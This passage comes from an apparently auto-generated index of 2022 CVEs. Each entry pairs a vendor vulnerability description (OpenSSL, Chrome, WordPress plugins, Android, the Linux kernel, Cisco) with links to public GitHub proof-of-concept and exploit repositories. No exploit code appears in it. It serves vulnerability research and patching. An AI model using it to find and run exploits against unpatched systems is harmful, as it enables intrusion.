CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6). + + +- [NCSC-NL/OpenSSL-2022](https://github.com/NCSC-NL/OpenSSL-2022) +- [colmmacc/CVE-2022-3602](https://github.com/colmmacc/CVE-2022-3602) +- [eatscrayon/CVE-2022-3602-poc](https://github.com/eatscrayon/CVE-2022-3602-poc) +- [attilaszia/cve-2022-3602](https://github.com/attilaszia/cve-2022-3602) +- [alicangnll/SpookySSL-Scanner](https://github.com/alicangnll/SpookySSL-Scanner) +- [rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc](https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc) +- [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602) +- [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786) + +### CVE-2022-3656 (2022-11-01) + +Insufficient data validation in File System in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium) + + +- [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656) + +### CVE-2022-3699 (2023-10-24) + +\nA privilege escalation vulnerability was reported in the Lenovo HardwareScanPlugin prior to version 1.3.1.2 and Lenovo Diagnostics prior to version 4.45\n\n\n\n that could allow a local user to execute code with elevated privileges. + + +- [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699) +- [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec) +- [Eap2468/CVE-2022-3699](https://github.com/Eap2468/CVE-2022-3699) + +### CVE-2022-3786 (2022-11-01) + +A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the `.' character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service). In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.\n\n + + +- [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz) + +### CVE-2022-3904 (2023-01-16) + +The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics. + + +- [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904) + +### CVE-2022-3910 (2022-11-22) + +Use After Free vulnerability in Linux Kernel allows Privilege Escalation. An improper Update of Reference Count in io_uring leads to Use-After-Free and Local Privilege Escalation.\nWhen io_msg_ring was invoked with a fixed file, it called io_fput_file() which improperly decreased its reference count (leading to Use-After-Free and Local Privilege Escalation). Fixed files are permanently registered to the ring, and should not be put separately.\n\nWe recommend upgrading past commit https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 \n + + +- [veritas501/CVE-2022-3910](https://github.com/veritas501/CVE-2022-3910) +- [TLD1027/CVE-2022-3910](https://github.com/TLD1027/CVE-2022-3910) + +### CVE-2022-3942 (2022-11-11) + +A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability. + + +- [maikroservice/CVE-2022-3942](https://github.com/maikroservice/CVE-2022-3942) + +### CVE-2022-3949 (2022-11-11) + +A vulnerability, which was classified as problematic, has been found in Sourcecodester Simple Cashiering System. This issue affects some unknown processing of the component User Account Handler. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-213455. + + +- [maikroservice/CVE-2022-3949](https://github.com/maikroservice/CVE-2022-3949) + +### CVE-2022-3992 (2022-11-14) + +A vulnerability classified as problematic was found in SourceCodester Sanitization Management System. Affected by this vulnerability is an unknown functionality of the file admin/?page=system_info of the component Banner Image Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-213571. + + +- [Urban4/CVE-2022-3992](https://github.com/Urban4/CVE-2022-3992) + +### CVE-2022-4047 (2022-12-26) + +The Return Refund and Exchange For WooCommerce WordPress plugin before 4.0.9 does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE + + +- [im-hanzou/WooRefer](https://github.com/im-hanzou/WooRefer) +- [entroychang/CVE-2022-4047](https://github.com/entroychang/CVE-2022-4047) + +### CVE-2022-4060 (2023-01-16) + +The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it. + + +- [im-hanzou/UPGer](https://github.com/im-hanzou/UPGer) + +### CVE-2022-4061 (2022-12-19) + +The JobBoardWP WordPress plugin before 1.2.2 does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP. + + +- [im-hanzou/JBWPer](https://github.com/im-hanzou/JBWPer) + +### CVE-2022-4063 (2022-12-19) + +The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers. + + +- [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer) + +### CVE-2022-4096 (2022-11-21) + +Server-Side Request Forgery (SSRF) in GitHub repository appsmithorg/appsmith prior to 1.8.2. + + +- [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096) + +### CVE-2022-4262 (2022-12-02) + +Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [bjrjk/CVE-2022-4262](https://github.com/bjrjk/CVE-2022-4262) +- [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262) +- [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262) + +### CVE-2022-4304 (2023-02-08) + +A timing based side channel exists in the OpenSSL RSA Decryption implementation\nwhich could be sufficient to recover a plaintext across a network in a\nBleichenbacher style attack. To achieve a successful decryption an attacker\nwould have to be able to send a very large number of trial messages for\ndecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\nRSA-OEAP and RSASVE.\n\nFor example, in a TLS connection, RSA is commonly used by a client to send an\nencrypted pre-master secret to the server. An attacker that had observed a\ngenuine connection between a client and a server could use this flaw to send\ntrial messages to the server and record the time taken to process them. After a\nsufficiently large number of messages the attacker could recover the pre-master\nsecret used for the original connection and thus be able to decrypt the\napplication data sent over that connection.\n\n + + +- [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304) + +### CVE-2022-4395 (2023-01-30) + +The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE. + + +- [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395) + +### CVE-2022-4510 (2023-01-25) + +\nA path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins.\n This vulnerability is associated with program files src/binwalk/plugins/unpfs.py.\n\nThis issue affects binwalk from 2.1.2b through 2.3.3 included.\n\n + + +- [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510) +- [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath) +- [Kalagious/BadPfs-CVE-2022-4510](https://github.com/Kalagious/BadPfs-CVE-2022-4510) + +### CVE-2022-4539 (2024-08-31) + +The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + + +- [Abdurahmon3236/CVE-2022-4539](https://github.com/Abdurahmon3236/CVE-2022-4539) + +### CVE-2022-4543 (2023-01-11) + +A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems. + + +- [sunichi/cve-2022-4543-wrapper](https://github.com/sunichi/cve-2022-4543-wrapper) + +### CVE-2022-4611 (2022-12-19) + +Es wurde eine problematische Schwachstelle in Click Studios Passwordstate and Passwordstate Browser Extension Chrome gefunden. Dabei betrifft es einen unbekannter Codeteil. Mit der Manipulation mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611) +- [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611) + +### CVE-2022-4616 (2023-01-12) + +The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to \ncommand injection through the network diagnosis page. This vulnerability\n could allow a remote unauthenticated user to add files, delete files, \nand change file permissions.\n\n + + +- [ahanel13/CVE-2022-4616-POC](https://github.com/ahanel13/CVE-2022-4616-POC) + +### CVE-2022-4896 (2023-09-12) + +Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core. + + +- [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896) + +### CVE-2022-4939 (2023-04-05) + +THe WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator. + + +- [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-) + +### CVE-2022-4944 (2023-04-22) + +Eine problematische Schwachstelle wurde in kalcaddle KodExplorer bis 4.49 entdeckt. Davon betroffen ist unbekannter Code. Durch Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.50 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [brosck/CVE-2022-4944](https://github.com/brosck/CVE-2022-4944) + +### CVE-2022-5561 +- [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561) + +### CVE-2022-8475 +- [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475) + +### CVE-2022-10270 +- [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp) + +### CVE-2022-14733 +- [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733) + +### CVE-2022-20004 (2022-05-10) + +In checkSlicePermission of SliceManagerService.java, it is possible to access any slice URI due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-179699767 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004) + +### CVE-2022-20005 (2022-05-10) + +In validateApkInstallLocked of PackageInstallerSession.java, there is a way to force a mismatch between running code and a parsed APK . This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-219044664 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005) + +### CVE-2022-20007 (2022-05-10) + +In startActivityForAttachedApplicationIfNeeded of RootWindowContainer.java, there is a possible way to overlay an app that believes it's still in the foreground, when it is not, due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-211481342 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007) +- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007) + +### CVE-2022-20009 (2022-05-10) + +In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-213172319References: Upstream kernel + + +- [szymonh/android-gadget](https://github.com/szymonh/android-gadget) + +### CVE-2022-20126 (2022-06-15) + +In setScanMode of AdapterService.java, there is a possible way to enable Bluetooth discovery mode without user interaction due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-203431023 + + +- [Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126](https://github.com/Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126) + +### CVE-2022-20128 +- [irsl/CVE-2022-20128](https://github.com/irsl/CVE-2022-20128) + +### CVE-2022-20130 (2022-06-15) + +In transportDec_OutOfBandConfig of tpdec_lib.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224314979 + + +- [Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130](https://github.com/Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130) + +### CVE-2022-20138 (2022-06-15) + +In ACTION_MANAGED_PROFILE_PROVISIONED of DevicePolicyManagerService.java, there is a possible way for unprivileged app to send MANAGED_PROFILE_PROVISIONED intent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-210469972 + + +- [ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138) + +### CVE-2022-20140 (2022-06-15) + +In read_multi_rsp of gatt_sr.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-227618988 + + +- [RenukaSelvar/system_bt_aosp10_cve-2022-20140](https://github.com/RenukaSelvar/system_bt_aosp10_cve-2022-20140) + +### CVE-2022-20142 (2022-06-15) + +In createFromParcel of GeofenceHardwareRequestParcelable.java, there is a possible arbitrary code execution due to parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-216631962 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142) +- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142) + +### CVE-2022-20186 (2022-06-15) + +In kbase_mem_alias of mali_kbase_mem_linux.c, there is a possible arbitrary code execution due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-215001024References: N/A + + +- [Bariskizilkaya/CVE-2022-20186_CTXZ](https://github.com/Bariskizilkaya/CVE-2022-20186_CTXZ) +- [SmileTabLabo/CVE-2022-20186](https://github.com/SmileTabLabo/CVE-2022-20186) + +### CVE-2022-20223 (2022-07-13) + +In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-223578534 + + +- [xbee9/cve-2022-20223](https://github.com/xbee9/cve-2022-20223) + +### CVE-2022-20224 (2022-07-13) + +In AT_SKIP_REST of bta_hf_client_at.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure in the Bluetooth stack with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-220732646 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224) +- [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224) + +### CVE-2022-20229 (2022-07-13) + +In bta_hf_client_handle_cind_list_item of bta_hf_client_at.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224536184 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229) + +### CVE-2022-20338 (2022-08-11) + +In HierarchicalUri.readFrom of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to a local escalation of privilege, preventing processes from validating URIs correctly, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-171966843 + + +- [Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338) +- [Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338) + +### CVE-2022-20347 (2022-08-09) + +In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to remote escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228450811 + + +- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347) +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347) +- [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347) + +### CVE-2022-20360 (2022-08-09) + +In setChecked of SecureNfcPreferenceController.java, there is a missing permission check. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228314987 + + +- [726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360) + +### CVE-2022-20361 (2022-08-09) + +In btif_dm_auth_cmpl_evt of btif_dm.cc, there is a possible vulnerability in Cross-Transport Key Derivation due to Weakness in Bluetooth Standard. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-231161832 + + +- [francozappa/blur](https://github.com/francozappa/blur) + +### CVE-2022-20409 (2022-10-11) + +In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238177383References: Upstream kernel + + +- [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring) + +### CVE-2022-20413 (2022-10-11) + +In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235850634 + + +- [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413) + +### CVE-2022-20421 (2022-10-11) + +In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel + + +- [0xkol/badspin](https://github.com/0xkol/badspin) + +### CVE-2022-20452 (2022-11-08) + +In initializeFromParcelLocked of BaseBundle.java, there is a possible method arbitrary code execution due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-240138318 + + +- [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue) + +### CVE-2022-20456 (2023-01-24) + +In AutomaticZenRule of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703780 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456) + +### CVE-2022-20470 (2022-12-13) + +In bindRemoteViewsService of AppWidgetServiceImpl.java, there is a possible way to bypass background activity launch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-234013191 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470) + +### CVE-2022-20473 (2022-12-13) + +In toLanguageTag of LocaleListCache.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-239267173 + + +- [Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473) +- [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473) + +### CVE-2022-20474 (2022-12-13) + +In readLazyValue of Parcel.java, there is a possible loading of arbitrary code into the System Settings app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-240138294 + + +- [cxxsheng/CVE-2022-20474](https://github.com/cxxsheng/CVE-2022-20474) + +### CVE-2022-20489 (2023-01-24) + +In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703460 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489) + +### CVE-2022-20490 (2023-01-24) + +In multiple functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703505 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490) + +### CVE-2022-20492 (2023-01-24) + +In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242704043 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492) + +### CVE-2022-20493 (2023-01-24) + +In Condition of Condition.java, there is a possible way to grant notification access due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242846316 + + +- [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493) + +### CVE-2022-20494 (2023-01-24) + +In AutomaticZenRule of AutomaticZenRule.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243794204 + + +- [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494) + +### CVE-2022-20607 (2022-12-16) + +In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A + + +- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607) + +### CVE-2022-20699 (2022-02-10) + +Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. + + +- [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699) +- [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699) +- [rohan-flutterint/CVE-2022-20699](https://github.com/rohan-flutterint/CVE-2022-20699) + +### CVE-2022-20818 (2022-09-30) + +Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user. + + +- [mbadanoiu/CVE-2022-20818](https://github.com/mbadanoiu/CVE-2022-20818) + +### CVE-2022-20829 (2022-06-24) + +A vulnerability in the packaging of Cisco Adaptive Security Device Manager (ASDM) images and the validation of those images by Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker with administrative privileges to upload an ASDM image that contains malicious code to a device that is running Cisco ASA Software. This vulnerability is due to insufficient validation of the authenticity of an ASDM image during its installation on a device that is running Cisco ASA Software. An attacker could exploit this vulnerability by installing a crafted ASDM image on the device that is running Cisco ASA Software and then waiting for a targeted user to access that device using ASDM. A successful exploit could allow the attacker to execute arbitrary code on the machine of the targeted user with the privileges of that user on that machine. Notes: To successfully exploit this vulnerability, the attacker must have administrative privileges on the device that is running Cisco ASA Software. Potential targets are limited to users who manage the same device that is running Cisco ASA Software using ASDM. Cisco has released and will release software updates that address this vulnerability. + + +- [jbaines-r7/theway](https://github.com/jbaines-r7/theway) + +### CVE-2022-20866 (2022-08-10) + +A vulnerability in the handling of RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve an RSA private key. This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key. The following conditions may be observed on an affected device: This vulnerability will apply to approximately 5 percent of the RSA keys on a device that is running a vulnerable release of Cisco ASA Software or Cisco FTD Software; not all RSA keys are expected to be affected due to mathematical calculations applied to the RSA key. The RSA key could be valid but have specific characteristics that make it vulnerable to the potential leak of the RSA private key. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. See the Indicators of Compromise section for more information on the detection of this type of RSA key. The RSA key could be 